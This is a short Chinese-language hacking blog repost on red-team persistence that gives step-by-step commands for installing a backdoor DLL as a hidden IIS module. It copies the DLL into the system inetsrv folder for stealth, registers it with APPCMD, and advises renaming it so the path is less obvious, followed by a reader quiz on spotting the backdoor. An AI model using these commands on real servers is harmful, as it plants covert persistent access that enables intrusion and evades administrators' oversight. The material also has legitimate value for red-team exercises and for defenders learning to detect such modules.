记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【红蓝攻防】红队中的内网权限维持(2)

2021-03-07 01:23

IIS - Module后门

把后门dll放到  C:\Windows\System32\inetsrv,增加隐蔽性(可以自己改名)

copy IIS-Backdoor.dll %windir%\System32\inetsrv\IIS-Backdoor.dll

安装后门

C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:0-sec /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true

删除后门

C:\Windows\system32\inetsrv\APPCMD.EXE uninstall module 0-sec

查看已安装模块

C:\Windows\system32\inetsrv\APPCMD.EXE list module


运行inetmgr.exe,进入IIS管理器,选择Modules


再通过主控端进行命令执行操作


流量分析



再次访问模块,发现刚刚新建的模块直接显示的就是绝对路径泄漏的太明显了。我们重新编辑修改一下


最后再来个有奖竞答,底下截图的模块里,哪一个才是后门?


第一个留言回答正确的奖励文库邀请码一枚,如果有账号则加20信誉值积分。




知识来源: https://mp.weixin.qq.com/s?__biz=MzU5OTAzNTgzNQ==&mid=2247484550&idx=1&sn=ca3b02ff71d8c1e124663e35716d6c61

阅读:254008 | 评论:0 | 标签:攻防

想收藏或者和大家分享这篇好文章→复制链接地址

“【红蓝攻防】红队中的内网权限维持(2)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁